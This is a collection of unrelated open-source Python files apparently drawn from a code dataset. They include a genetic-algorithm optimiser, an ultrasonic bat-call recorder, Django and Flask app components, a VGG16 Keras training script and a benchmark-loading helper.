self.p_crossover = p_crossover
self.p_replication = p_replication
# Diversity factor - sets how much diversity is preferred over highest
# reward
self.diversity_factor = diversity_factor
# Maximum number of mutations and fields that are crossed over
self.max_mutations = max_mutations
self.max_cross = max_cross
# Limits on each entry in the array
self.coordinate_range = coordinate_range
# Threshold on the reward when to stop forcing diversity
self.reward_th = reward_th
def get_new_generation(self, old_generation):
# sorts the generation by reward it got
# -1 is to sort it in descending order
old_generation = old_generation[((-1)*old_generation[:,1]).argsort()]
# always copy the top performer
old_vectors = list(old_generation[:,0])
new_generation = np.array([old_generation[0][0]])
# when reached high reward for an extended period, stop forcing diversity
if old_generation[0][1] >= self.reward_th:
self.diversity_factor = 0
while len(new_generation)!=len(old_generation):
# Randomly choose the genetic alteration applied
genetic_type = np.random.choice(['mut', 'cross', 'repl'],
p=[self.p_mutation,
self.p_crossover,
self.p_replication])
# Find vector choice probabilities based on rewards and diversity
vec_choice_probabilities = list(self.get_choice_probabilities(old_generation,
new_generation))
# Choose 2 vectors for the next genetic operation - possibly only
# one of them will be used
vec1_idx, vec2_idx = np.random.choice(len(old_vectors), size=2, replace=False, p=vec_choice_probabilities)
vec1 = old_vectors[vec1_idx]
vec2 = old_vectors[vec2_idx]
if genetic_type=='mut':
#print('mutating')
new_generation = np.concatenate((new_generation, [self.apply_mutation(vec1)]))
if genetic_type=='repl':
#print('replicating')
new_generation = np.concatenate((new_generation, [vec1]))
if genetic_type=='cross':
#print('crossing')
vec1, vec2 = self.apply_crossover(vec1, vec2)
new_generation = np.concatenate((new_generation, [vec1]))
if len(new_generation)<len(old_generation):
new_generation = np.concatenate((new_generation, [vec2]))
return new_generation
def measure_diversity(self, vec, vec_list):
# measure average euclidean distance from a vector to the list of
# already chosen vectors - ensures exploration
distances = []
for y in vec_list:
distances.append(np.linalg.norm(vec-y))
diversity = np.average(distances)
return diversity
def get_choice_probabilities(self, old_generation, new_generation):
# list of the second element
rewards = old_generation[:,1]
diversified_rewards = rewards + np.array([self.measure_diversity(vec, new_generation)*
self.diversity_factor for vec in old_generation[:,0]])
probabilities = diversified_rewards/np.sum(diversified_rewards)
return probabilities
def apply_mutation(self, vec):
# Get the number of fields to mutate
no_mutations = np.random.randint(1, self.max_mutations+1)
# Get the indices of the fields to mutate
idx_to_mutate = np.random.choice(len(vec), no_mutations, replace=False)
# Mutation is changing a value of a field to a random value
# Coordinate ranges hold the range that variable can take, bounded to
# accelerate learning
for idx in idx_to_mutate:
coordinate_range = self.coordinate_range[idx]
vec[idx] = np.random.sample()*(coordinate_range[1]-coordinate_range[0])+coordinate_range[0]
return vec
def apply_crossover(self, vec1, vec2):
# Get the number of fields to cross over
no_cross = np.random.randint(1, self.max_cross+1)
# Get the indices of the fields to cross over
idx_to_cross = np.random.choice(len(vec1), no_cross, replace=False)
for idx in idx_to_cross:
temp = vec1[idx]
vec1[idx] = vec2[idx]
vec2[idx] = temp
return vec1, vec2
def get_nearby_trajectory(self, vec, idx1=0, idx2=-1):
# Modify the trajectory between given indices
new_trajectory = (np.random.random()*0.1+0.95)*vec
return new_trajectory
def f(x, y):
return np.exp(-(x*x+y*y))*(np.cos(2*np.pi*x)**2)*(np.cos(2*np.pi*y)**2)
def main():
generation = []
xrange = [-2.0, 2.0]
yrange = [-2.0, 2.0]
for i in range(15):
generation.append([np.random.random()*(xrange[1]-xrange[0])+xrange[0],
np.random.random()*(yrange[1]-yrange[0])+yrange[0]])
geneticAgent = GeneticAgent(0.4, 0.3, 0.3, 0.3, 1, 1, [xrange, yrange], 0.9)
for itr in range(0, 100):
rewarded_generation = []
for sample in generation:
rewarded_generation.append([sample, f(sample[0], sample[1])])
rewarded_generation = np.array(rewarded_generation)
generation = geneticAgent.get_new_generation(rewarded_generation)
print(rewarded_generation)
print(max(rewarded_generation[:, 1]))
if __name__=='__main__':
main()
| StarcoderdataPython |
8020631 | #!/usr/bin/python3
# -*- coding:utf-8 -*-
# Project: http://cloudedbats.org
# Copyright (c) 2016-2018 <NAME>
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
import os
import logging
import time
import wave
import pyaudio
import wurb_core
def default_settings():
""" Available settings for the this module.
This info is used to define default values and to
generate the wurb_settings_DEFAULT.txt file."""
description = [
'# Settings for the sound recorder.',
]
default_settings = [
{'key': 'rec_directory_path', 'value': '/media/usb0/wurb1_rec'},
{'key': 'rec_filename_prefix', 'value': 'WURB1'},
{'key': 'rec_format', 'value': 'FS'}, # "TE" (Time Expansion) ot "FS" (Full Scan).
{'key': 'rec_max_length_s', 'value': '20'},
{'key': 'rec_buffers_s', 'value': 2.0}, # Pre- and post detected sound buffer size.
# Hardware.
{'key': 'rec_sampling_freq_khz', 'value': '384'},
{'key': 'rec_microphone_type', 'value': 'USB'}, # "USB" or "M500".
{'key': 'rec_part_of_device_name', 'value': 'Pettersson'},
{'key': 'rec_device_index', 'value': 0}, # Not used if "rec_part_of_device_name" is found.
]
developer_settings = [
{'key': 'rec_source_debug', 'value': 'N'},
{'key': 'rec_proc_debug', 'value': 'N'},
{'key': 'rec_target_debug', 'value': 'N'},
{'key': 'rec_source_adj_time_on_drift', 'value': 'Y'},
]
#
return description, default_settings, developer_settings
def get_device_list():
""" Sound source util. Check connected sound cards. """
py_audio = pyaudio.PyAudio()
device_list = []
device_count = py_audio.get_device_count()
for index in range(device_count):
info_dict = py_audio.get_device_info_by_index(index)
# Sound card for input only.
if info_dict['maxInputChannels'] != 0:
device_list.append(info_dict['name'])
#
return device_list
def get_device_index(part_of_device_name):
""" Sound source util. Lookup for device by name. """
py_audio = pyaudio.PyAudio()
device_count = py_audio.get_device_count()
for index in range(device_count):
info_dict = py_audio.get_device_info_by_index(index)
if part_of_device_name in info_dict['name']:
return index
#
return None
class WurbRecorder(object):
""" """
def __init__(self, callback_function=None):
""" """
self._callback_function = callback_function
self._logger = logging.getLogger('CloudedBatsWURB')
self._settings = wurb_core.WurbSettings()
#
self._sound_manager = None
# self._is_recording = False
def setup_sound_manager(self):
""" """
# Sound stream parts:
# - Source
self._sound_source = None
if self._settings.text('rec_microphone_type') == 'M500':
# The Pettersson M500 microphone is developed for Windows. Special code to handle M500.
self._sound_source = wurb_core.SoundSourceM500(callback_function=self._callback_function)
else:
# Generic USB microphones, including Pettersson M500-384.
self._sound_source = wurb_core.SoundSource(callback_function=self._callback_function)
# - Process.
self._sound_process = wurb_core.SoundProcess(callback_function=self._callback_function)
# - Target.
self._sound_target = wurb_core.SoundTarget(callback_function=self._callback_function)
# - Manager.
self._sound_manager = wurb_core.SoundStreamManager(
self._sound_source,
self._sound_process,
self._sound_target)
def start_recording(self):
""" """
if self._sound_manager:
self._sound_manager.start_streaming()
def stop_recording(self, stop_immediate=False):
""" """
if self._sound_manager:
self._sound_manager.stop_streaming(stop_immediate)
class SoundSource(wurb_core.SoundSourceBase):
""" Subclass of SoundSourceBase. """
def __init__(self, callback_function=None):
""" """
self._callback_function = callback_function
self._logger = logging.getLogger('CloudedBatsWURB')
self._settings = wurb_core.WurbSettings()
#
super(SoundSource, self).__init__()
#
self._debug = self._settings.boolean('rec_source_debug')
self._rec_source_adj_time_on_drift = self._settings.boolean('rec_source_adj_time_on_drift')
#
self._pyaudio = pyaudio.PyAudio()
self._stream = None
#
self.read_settings()
def read_settings(self):
""" Called from base class. """
if self._settings.text('rec_microphone_type') == 'M500':
# For Pettersson M500. Overrides settings.
self._sampling_freq_hz = 500000
else:
# From settings. Defaults for Pettersson M500-384.
self._sampling_freq_hz = self._settings.integer('rec_sampling_freq_khz') * 1000
# Sound card.
in_device_name = self._settings.text('rec_part_of_device_name')
in_device_index = self._settings.integer('rec_device_index') # Default=0. First recognized sound card.
if in_device_name:
self._in_device_index = wurb_core.get_device_index(in_device_name)
else:
self._in_device_index = in_device_index
self._logger.info('Recorder: Sampling frequency (hz): ' + str(self._sampling_freq_hz))
def _setup_pyaudio(self):
""" """
# Initiate PyAudio.
try:
self._stream = self._pyaudio.open(
format = self._pyaudio.get_format_from_width(2), # 2=16 bits.
channels = 1, # 1=Mono.
rate = self._sampling_freq_hz,
frames_per_buffer = self._sampling_freq_hz, # Buffer 1 sec.
input = True,
output = False,
input_device_index = self._in_device_index,
start = False,
)
except Exception as e:
self._stream = None
self._logger.error('Recorder: Failed to create stream: ' + str(e))
# Report to state machine.
if self._callback_function:
self._callback_function('rec_source_error')
return
def source_exec(self):
""" Called from base class. """
if self._stream is None:
self._setup_pyaudio()
#
if self._stream:
self._active = True
self._stream_active = True
self._stream_time_s = time.time()
self._stream.start_stream()
else:
self._logger.error('Recorder: Failed to read stream.')
return
#
buffer_size = int(self._sampling_freq_hz / 2)
# Main source loop.
try:
data = self._stream.read(buffer_size) #, exception_on_overflow=False)
while self._active and data:
# Add time and check for time drift.
self._stream_time_s += 0.5 # One buffer is 0.5 sec.
if (self._stream_time_s > (time.time() + 10)) or \
(self._stream_time_s < (time.time() - 10)):
#
time_diff_s = int(time.time() - self._stream_time_s)
if self._rec_source_adj_time_on_drift:
self._logger.warning('Recorder: Rec. time adjusted. Diff: ' + str(time_diff_s) + ' sec.')
self._stream_time_s = time.time()
else:
self._logger.debug('Recorder: Rec. time drift. Diff: ' + str(time_diff_s) + ' sec.')
# Push time and data buffer.
self.push_item((self._stream_time_s, data))
#
data = self._stream.read(buffer_size) #, exception_on_overflow=False)
except Exception as e:
self._logger.error('Recorder: Failed to read stream: ' + str(e))
# Main loop terminated.
self._logger.debug('Source: Source terminated.')
self.push_item(None)
#
if self._stream is not None:
try:
self._stream.stop_stream()
self._stream.close()
except:
self._logger.error('Recorder: Pyaudio stream stop/close failed.')
self._stream = None
class SoundSourceM500(SoundSource):
""" Subclass of SoundSource for the Pettersson M500 microphone. """
def __init__(self, callback_function=None):
""" """
super(SoundSourceM500, self).__init__(callback_function)
#
self._debug = self._settings.boolean('rec_source_debug')
self._rec_source_adj_time_on_drift = self._settings.boolean('rec_source_adj_time_on_drift')
#
self._m500batmic = None
def source_exec(self):
""" For the Pettersson M500 microphone. """
self._active = True
#
try:
if not self._m500batmic:
self._m500batmic = wurb_core.PetterssonM500BatMic()
#
self._stream_active = True
#
self._stream_time_s = time.time()
self._m500batmic.start_stream()
self._m500batmic.led_on()
except Exception as e:
self._logger.error('Recorder: Failed to create stream: ' + str(e))
# Report to state machine.
if self._callback_function:
self._callback_function('rec_source_error')
return
#
# buffer_size = int(self._sampling_freq_hz / 2)
buffer_size = int(self._sampling_freq_hz)
# Main source loop.
data = self._m500batmic.read_stream().tostring()
data_array = data
while self._active and (len(data) > 0):
# Push 0.5 sec each time. M500 can't deliver that size directly.
if len(data_array) >= buffer_size:
# Add time and check for time drift.
self._stream_time_s += 0.5 # One buffer is 0.5 sec.
if (self._stream_time_s > (time.time() + 10)) or \
(self._stream_time_s < (time.time() - 10)):
#
time_diff_s = int(time.time() - self._stream_time_s)
if self._rec_source_adj_time_on_drift:
self._logger.warning('Recorder: Rec. time adjusted. Diff: ' + str(time_diff_s) + ' sec.')
self._stream_time_s = time.time()
else:
self._logger.debug('Recorder: Rec. time drift. Diff: ' + str(time_diff_s) + ' sec.')
# Push time and data buffer.
self.push_item((self._stream_time_s, data_array[0:buffer_size]))
data_array = data_array[buffer_size:]
#
data = self._m500batmic.read_stream().tostring()
data_array += data
#
self._logger.debug('Source M500: Source terminated.')
self.push_item(None)
#
self._m500batmic.stop_stream()
class SoundProcess(wurb_core.SoundProcessBase):
""" Subclass of SoundProcessBase. """
def __init__(self, callback_function=None):
""" """
self._callback_function = callback_function
self._logger = logging.getLogger('CloudedBatsWURB')
self._settings = wurb_core.WurbSettings()
#
super(SoundProcess, self).__init__()
#
self._debug = self._settings.boolean('rec_proc_debug')
self._rec_buffers_s = self._settings.float('rec_buffers_s')
def process_exec(self):
""" Called from base class. """
self._active = True
# Get sound detector based on user settings.
sound_detector = None
try:
sound_detector = wurb_core.SoundDetector().get_detector()
except Exception as e:
sound_detector = None
self._logger.error('Recorder: SoundDetector exception: ', str(e))
sound_detected = False
#
buffer_size = int(self._rec_buffers_s * 2.0) # Buffers are of 0.5 sec length.
#
silent_buffer = []
silent_counter = 9999 # Don't send before sound detected.
try:
while self._active:
time_and_data = self.pull_item()
if time_and_data is None:
self._logger.debug('Rec-process terminated.')
self._active = False
# Terminated by previous step.
self.push_item(None)
else:
# self.process_buffer(raw_data)
try:
sound_detected = sound_detector.check_for_sound(time_and_data)
except Exception as e:
sound_detected = True
#
if sound_detected:
if self._debug:
print('DEBUG: Sound detected.')
# Send pre buffer if this is the first one.
if len(silent_buffer) > 0:
for silent_time_and_data in silent_buffer:
self.push_item(silent_time_and_data)
#
silent_buffer = []
# Send buffer.
self.push_item(time_and_data)
silent_counter = 0
else:
if self._debug:
print('DEBUG: Sound not detected. Counter: ', silent_counter)
if silent_counter < buffer_size: # Unit 0.5 sec.
# Send after sound detected.
self.push_item(time_and_data)
silent_counter += 1
elif silent_counter < (buffer_size * 2): # Unit 0.5 sec.
# Accept longer silent part between pulses.
silent_buffer.append(time_and_data)
silent_counter += 1
else:
# Silent, but store in pre buffer.
self.push_item(False)
silent_buffer.append(time_and_data)
while len(silent_buffer) > buffer_size: # Unit 0.5sec.
silent_buffer.pop(0)
except Exception as e:
self._logger.error('Recorder: Sound process_exec exception: ', str(e))
class SoundTarget(wurb_core.SoundTargetBase):
""" Subclass of SoundTargetBase. """
def __init__(self, callback_function=None):
""" """
self._callback_function = callback_function
self._logger = logging.getLogger('CloudedBatsWURB')
self._settings = wurb_core.WurbSettings()
#
super(SoundTarget, self).__init__()
# From settings.
self._dir_path = self._settings.text('rec_directory_path')
self._filename_prefix = self._settings.text('rec_filename_prefix')
rec_max_length_s = self._settings.integer('rec_max_length_s')
self._rec_max_length = rec_max_length_s * 2
# Default for latitude/longitude in the decimal degree format.
self._latitude = float(self._settings.float('default_latitude'))
self._longitude = float(self._settings.float('default_longitude'))
# Different microphone types.
if self._settings.text('rec_microphone_type') == 'M500':
# For M500 only.
if self._settings.text('rec_format') == 'TE':
self._filename_rec_type = 'TE500'
self._out_sampling_rate_hz = 50000
else:
self._filename_rec_type = 'FS500'
self._out_sampling_rate_hz = 500000
else:
# For standard USB, inclusive M500-384.
if self._settings.text('rec_format') == 'TE':
self._filename_rec_type = 'TE' + self._settings.text('rec_sampling_freq_khz')
self._out_sampling_rate_hz = self._settings.integer('rec_sampling_freq_khz') * 100
else:
self._filename_rec_type = 'FS' + self._settings.text('rec_sampling_freq_khz')
self._out_sampling_rate_hz = self._settings.integer('rec_sampling_freq_khz') * 1000
#
self._total_start_time = None
self._internal_buffer_list = []
self._write_thread_active = False
self._active = False
def target_exec(self):
""" Called from base class. """
self._active = True
wave_file_writer = None
# Use buffer to increase write speed.
item_list = []
item_list_max = 5 # Unit 0.5 sec. Before flush to file.
item_counter = 0
#
try:
while self._active:
item = self.pull_item()
# "None" indicates terminate by previous part in chain.
if item is None:
self._active = False # Terminated by previous step.
continue
# "False" indicates silent part. Close file until not silent.
elif item is False:
if wave_file_writer:
# Flush buffer.
joined_items = b''.join(item_list)
item_list = []
wave_file_writer.write(joined_items)
# Close.
wave_file_writer.close()
wave_file_writer = None
item_counter = 0
#
continue
# Normal case, write frames.
else:
_rec_time, data = item # "rec_time" not used.
# Open file if first after silent part.
if not wave_file_writer:
wave_file_writer = WaveFileWriter(self)
# Check if max rec length was reached.
if item_counter >= self._rec_max_length:
if wave_file_writer:
# Flush buffer.
joined_items = b''.join(item_list)
item_list = []
wave_file_writer.write(joined_items)
# Close the old one.
wave_file_writer.close()
wave_file_writer = None
item_counter = 0
# Open a new file.
wave_file_writer = WaveFileWriter(self)
# Append data to buffer
item_list.append(data)
item_counter += 1
# Flush buffer when needed.
if len(item_list) >= item_list_max:
if wave_file_writer:
joined_items = b''.join(item_list)
item_list = []
wave_file_writer.write(joined_items)
# Thread terminated.
if wave_file_writer:
if len(item_list) > 0:
# Flush buffer.
joined_items = b''.join(item_list)
item_list = []
wave_file_writer.write(joined_items)
#
wave_file_writer.close()
wave_file_writer = None
#
except Exception as e:
self._logger.error('Recorder: Sound target exception: ' + str(e))
self._active = False # Terminate
if self._callback_function:
self._callback_function('rec_target_error')
class WaveFileWriter():
""" Each file is connected to a separate object to avoid concurrency problems. """
def __init__(self, sound_target_obj):
""" """
self._wave_file = None
self._sound_target_obj = sound_target_obj
self._size_counter = 0
# Create file name.
# Default time and position.
datetimestring = time.strftime("%Y%m%dT%H%M%S%z")
latlongstring = '' # Format: 'N56.78E12.34'
try:
if sound_target_obj._latitude >= 0:
latlongstring += 'N'
else:
latlongstring += 'S'
latlongstring += str(abs(sound_target_obj._latitude))
#
if sound_target_obj._longitude >= 0:
latlongstring += 'E'
else:
latlongstring += 'W'
latlongstring += str(abs(sound_target_obj._longitude))
except:
latlongstring = 'N00.00E00.00'
# Use GPS time if available.
datetime_local_gps = wurb_core.WurbGpsReader().get_time_local_string()
if datetime_local_gps:
datetimestring = datetime_local_gps
# Use GPS position if available.
latlong = wurb_core.WurbGpsReader().get_latlong_string()
if latlong:
latlongstring = latlong
# Filename example: "WURB1_20180420T205942+0200_N00.00E00.00_TE384.wav"
filename = sound_target_obj._filename_prefix + \
'_' + \
datetimestring + \
'_' + \
latlongstring + \
'_' + \
sound_target_obj._filename_rec_type + \
'.wav'
filenamepath = os.path.join(sound_target_obj._dir_path, filename)
#
if not os.path.exists(sound_target_obj._dir_path):
os.makedirs(sound_target_obj._dir_path) # For data, full access.
# Open wave file for writing.
self._wave_file = wave.open(filenamepath, 'wb')
self._wave_file.setnchannels(1) # 1=Mono.
self._wave_file.setsampwidth(2) # 2=16 bits.
self._wave_file.setframerate(sound_target_obj._out_sampling_rate_hz)
#
sound_target_obj._logger.info('Recorder: New sound file: ' + filename)
def write(self, buffer):
""" """
self._wave_file.writeframes(buffer)
self._size_counter += len(buffer) / 2 # Count frames.
def close(self):
""" """
if self._wave_file is not None:
self._wave_file.close()
self._wave_file = None
length_in_sec = self._size_counter / self._sound_target_obj._out_sampling_rate_hz
self._sound_target_obj._logger.info('Recorder: Sound file closed. Length:' + str(length_in_sec) + ' sec.')
# === TEST ===
if __name__ == "__main__":
""" """
import sys
import pathlib
path = ".."
sys.path.append(path)
# Logging to standard output.
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
#
settings = wurb_core.WurbSettings()
(desc, default, dev) = wurb_core.wurb_recorder.default_settings()
settings.set_default_values(desc, default, dev)
(desc, default, dev) = wurb_core.wurb_gps_reader.default_settings()
settings.set_default_values(desc, default, dev)
#
internal_setting_path = pathlib.Path('../wurb_settings/user_settings.txt')
settings.load_settings(internal_setting_path)
#
recorder = wurb_core.WurbRecorder()
recorder.setup_sound_manager()
#
print('TEST - started.')
recorder.start_recording()
time.sleep(5.5)
recorder.stop_recording()
print('TEST - ended.')
| StarcoderdataPython |
11321496 | import os
import io
from flaskr.services.signal_service import signalService
from flaskr.models import db
from flaskr.models.word import Word
class DictionaryService:
@staticmethod
def get_words_from_db():
words_list = []
query = db.session.query(Word.word).all()
for word in query:
words_list.append(*word)
return words_list
@staticmethod
def get_existing_words(path):
words_list = []
file = io.open(path, 'r', encoding='utf8')
data = file.readlines()
for word in data:
words_list.append(word[:-1])
file.close()
return words_list
@staticmethod
def write_txt(words_list, path):
words_list.sort()
file = io.open(path, 'w', encoding='utf8')
for word in words_list:
file.write(word)
file.write('\n')
file.close()
file_written = signalService.get_signal('file_written')
file_written.send()
@staticmethod
def create_or_update_dictionary():
file_name = "dict.txt"
DictionaryService.write_txt(DictionaryService.get_words_from_db(), file_name)
| StarcoderdataPython |
3539463 | from django.contrib.auth import get_user_model
from rest_framework.fields import CharField
from rest_framework.serializers import ModelSerializer
from grandchallenge.challenges.models import Challenge
from grandchallenge.components.serializers import (
ComponentInterfaceValueSerializer,
)
from grandchallenge.evaluation.models import Evaluation, Phase, Submission
class UserSerializer(ModelSerializer):
class Meta:
model = get_user_model()
fields = ("username",)
class ChallengeSerializer(ModelSerializer):
class Meta:
model = Challenge
fields = ("title", "short_name")
class PhaseSerializer(ModelSerializer):
challenge = ChallengeSerializer()
class Meta:
model = Phase
fields = ("challenge", "title", "slug")
class SubmissionSerializer(ModelSerializer):
phase = PhaseSerializer()
creator = UserSerializer()
class Meta:
model = Submission
fields = (
"pk",
"phase",
"created",
"creator",
"comment",
"predictions_file",
"supplementary_file",
"supplementary_url",
)
class EvaluationSerializer(ModelSerializer):
submission = SubmissionSerializer()
outputs = ComponentInterfaceValueSerializer(many=True)
status = CharField(source="get_status_display", read_only=True)
title = CharField(read_only=True)
class Meta:
model = Evaluation
fields = (
"pk",
"method",
"submission",
"created",
"published",
"outputs",
"rank",
"rank_score",
"rank_per_metric",
"status",
"title",
)
| StarcoderdataPython |
239668 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
"""
Helpers to process schemas.
"""
from numpy import ndarray
from pandas import DataFrame, Series
from scipy.sparse import csr_matrix
from .data_roles import Role
from .data_schema import COL
from .data_stream import ViewDataStream, ViewBasePipelineItem
def _extract_label_column(learner, schema_y=None):
if schema_y is not None:
label_column = schema_y[0].Name
elif learner.label_column is not None:
label_column = learner.label_column
else:
label_column = Role.Label
return label_column
def _extract_columns(columns, side, none_allowed):
if columns is None:
if none_allowed:
return None
raise ValueError(
"'None' {0} passed when it cannot be none.".format(side))
if isinstance(columns, Series):
columns = [columns.name]
elif isinstance(columns, DataFrame):
columns = [_ for _ in columns.columns]
elif isinstance(columns, str):
columns = [columns]
elif isinstance(columns, (ViewDataStream, ViewBasePipelineItem)):
columns = columns.columns
elif isinstance(columns, ndarray):
# columns.flags['OWNDATA']
raise ValueError(
"There is not easy way to retrieve the original columns "
"from a numpy view. Use COL.")
elif isinstance(columns, csr_matrix):
# columns.flags['OWNDATA']
raise ValueError(
"There is not easy way to retrieve the original columns from a "
"csr_matrix view. Use COL.")
elif isinstance(columns, COL):
if side == 'input':
columns = columns.get_in()
elif side == 'output':
columns = columns.get_out()
else:
raise ValueError(
"side must be 'input' our 'output' not '{0}'".format(side))
if not isinstance(columns, list):
raise ValueError(
"{0} has to be a list of strings, instead got {1}".format(
side, type(columns)))
return columns
| StarcoderdataPython |
1646558 | # collector package
| StarcoderdataPython |
1615314 |
# Data Plotting
import matplotlib.pyplot as plt
# Deep learning
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping
def main():
trainer_data = ImageDataGenerator()
train_data = trainer_data.flow_from_directory(directory="train", target_size=(224, 224))
validator_data = ImageDataGenerator()
validation_data = validator_data.flow_from_directory(directory="validation", target_size=(224, 224))
'''
agg16 neural network architecture:
1.Convolution using 64 filters
2.Convolution using 64 filters + Max pooling
3.Convolution using 128 filters
4. Convolution using 128 filters + Max pooling
5. Convolution using 256 filters
6. Convolution using 256 filters
7. Convolution using 256 filters + Max pooling
8. Convolution using 512 filters
9. Convolution using 512 filters
10. Convolution using 512 filters+Max pooling
11. Convolution using 512 filters
12. Convolution using 512 filters
13. Convolution using 512 filters+Max pooling
14. Fully connected with 4096 nodes
15. Fully connected with 4096 nodes
16. Output layer with Softmax activation with required nodes (originally a 1000).
'''
model = keras.Sequential()
# 1
model.add(
layers.Conv2D(filters=64, kernel_size=[3, 3], activation='relu', padding='same', input_shape=(224, 224, 3)))
# 2
model.add(layers.Conv2D(filters=64, kernel_size=[3, 3], activation='relu', padding='same'))
model.add(layers.MaxPool2D(pool_size=(2, 2)))
# 3
model.add(layers.Conv2D(filters=128, kernel_size=[3, 3], activation='relu', padding='same'))
# 4
model.add(layers.Conv2D(filters=128, kernel_size=[3, 3], activation='relu', padding='same'))
model.add(layers.MaxPool2D(pool_size=(2, 2)))
# 5
model.add(layers.Conv2D(filters=256, kernel_size=[3, 3], activation='relu', padding='same'))
# 6
model.add(layers.Conv2D(filters=256, kernel_size=[3, 3], activation='relu', padding='same'))
# 7
model.add(layers.Conv2D(filters=256, kernel_size=[3, 3], activation='relu', padding='same'))
model.add(layers.MaxPool2D(pool_size=(2, 2)))
# 8
model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
# 9
model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
# 10
model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
model.add(layers.MaxPool2D(pool_size=(2, 2)))
# 11
model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
# 12
model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
# 13
model.add(layers.Conv2D(filters=512, kernel_size=[3, 3], activation='relu', padding='same'))
model.add(layers.MaxPool2D(pool_size=(2, 2)))
# 14
model.add(layers.Flatten())
model.add(layers.Dense(units=4096, activation='relu'))
model.add(layers.Dense(units=4096, activation='relu'))
model.add(layers.Dense(units=2, activation='softmax'))
model.build()
model.summary()
learning_rate = 0.001
model.compile(
optimizer=keras.optimizers.Adam(lr=learning_rate),
loss=keras.losses.categorical_crossentropy,
metrics=['accuracy']
)
# The model will only be saved to disk if the validation accuracy of the model in current epoch is greater than
# what it was in the last epoch.
checkpoint = ModelCheckpoint("vgg16_1.h5", monitor='val_accuracy', verbose=2, save_best_only=True,
save_weights_only=False, mode='auto', save_freq=1)
early = EarlyStopping(monitor='val_accuracy', min_delta=0, patience=20, verbose=1, mode='auto')
hist = model.fit(x=train_data, steps_per_epoch=len(train_data), validation_data=validation_data,
validation_steps=len(validation_data), epochs=5, verbose=2, callbacks=[checkpoint, early])
plt.plot(hist.history["acc"])
plt.plot(hist.history['val_acc'])
plt.plot(hist.history['loss'])
plt.plot(hist.history['val_loss'])
plt.title("model accuracy")
plt.ylabel("Accuracy")
plt.xlabel("Epoch")
plt.legend(["Accuracy", "Validation Accuracy", "loss", "Validation Loss"])
plt.show()
if __name__ == '__main__':
main()
| StarcoderdataPython |
5063683 | <gh_stars>0
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from bookstore.apps.catalog.views import (
BookListView,
BookDetailView,
AuthorListView,
AuthorDetailView,
PublishingCompanyListView,
)
app_name = "catalog"
urlpatterns = [
path(
"books/",
BookListView.as_view(),
name="book-list"
),
path(
"book/<slug:slug>/",
BookDetailView.as_view(),
name="book-detail"
),
path(
"authors/",
AuthorListView.as_view(),
name="author-list"
),
path(
"author/<slug:slug>/",
AuthorDetailView.as_view(),
name="author-detail"
),
path(
"publishingcompanies/",
PublishingCompanyListView.as_view(),
name="publishing-list",
),
]
urlpatterns += staticfiles_urlpatterns()
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| StarcoderdataPython |
1824852 | <filename>tests/test_base.py
# coding=utf-8
import os
import sys
import unittest
dirname = os.path.dirname(os.path.abspath(__file__))
project = os.path.dirname(dirname)
if project not in sys.path:
sys.path.insert(0, project)
class BaseTestCase(unittest.TestCase):
@staticmethod
def main():
return unittest.main(failfast=True)
| StarcoderdataPython |
11269214 | <filename>utils/monitor.py
from datetime import datetime
class Monitor:
def __init__(self):
self.last_time = None
def output(self, current_state, total_state, extra=None):
if self.last_time is None:
self.last_time = datetime.now()
position = int(current_state / total_state * 100)
string = "|"
for index in range(0, 100, 5):
if position >= index:
string += "█"
else:
string += " "
string += "|"
current_state = max(current_state, 1)
pass_time = (datetime.now() - self.last_time).total_seconds()
wait_time = int(pass_time * (total_state - current_state) / current_state)
string += " " * (3 - len(str(position))) + str(position) + "% ("
string += " " * (len(str(total_state)) - len(str(current_state))) + str(current_state) + "/" + str(total_state)
if current_state != total_state:
minute, second = divmod(wait_time, 60)
hour, minute = divmod(minute, 60)
string += ") wait " + "%04d:%02d:%02d" % (hour, minute, second)
else:
minute, second = divmod(pass_time, 60)
hour, minute = divmod(minute, 60)
string += ") used " + "%04d:%02d:%02d" % (hour, minute, second)
if extra is not None:
string += " " + str(extra).replace("\'", "").replace("{", "(").replace("}", ")") + "."
else:
string += "."
print("\r" + string, end="", flush=True)
if current_state == total_state:
self.last_time = None
print()
| StarcoderdataPython |
6647657 | from django import forms
from .models import Loan
from books.models import Book
class LoanForm(forms.ModelForm):
code = forms.CharField(label='Book Code')
class Meta:
model = Loan
fields = [
'to',
]
| StarcoderdataPython |
1965214 | <gh_stars>1-10
import pandas as pd
import numpy as np
import os, sys, json
import warnings
warnings.filterwarnings("ignore")
from .utils import *
from .metadata import get_task2category, bm_metric_names, benchmark_names, bm_split_names
from .evaluator import Evaluator
class BenchmarkGroup:
def __init__(self, name, path = './data'):
'''
-- PATH
-- ADMET_Benchmark
-- HIA_Hou
-- train.csv
-- valid.csv
-- test.csv
-- Caco2_Wang
-- train.csv
-- valid.csv
-- test.csv
....
from tdc import BenchmarkGroup
group = BenchmarkGroup(name = 'ADMET_Group', path = 'data/')
predictions = {}
for benchmark in group:
name = benchmark['name']
train, valid, test = benchmark['train'], benchmark['valid'], benchmark['test']
## --- train your model --- ##
predictions[name] = y_pred
group.evaluate(predictions)
# {'caco2_wang': 0.234, 'hia_hou': 0.786}
benchmark = group.get('Caco2_Wang')
train, valid, test = benchmark['train'], benchmark['valid'], benchmark['test']
## --- train your model --- ##
group.evaluate(y_pred, benchmark = 'Caco2_Wang')
# 0.234
group.get_more_splits()
'''
self.name = bm_group_load(name, path)
self.path = os.path.join(path, self.name)
self.datasets = benchmark_names[self.name]
self.dataset_names = []
for task, datasets in self.datasets.items():
for dataset in datasets:
self.dataset_names.append(dataset)
def __iter__(self):
self.index = 0
self.num_datasets = len(self.dataset_names)
return self
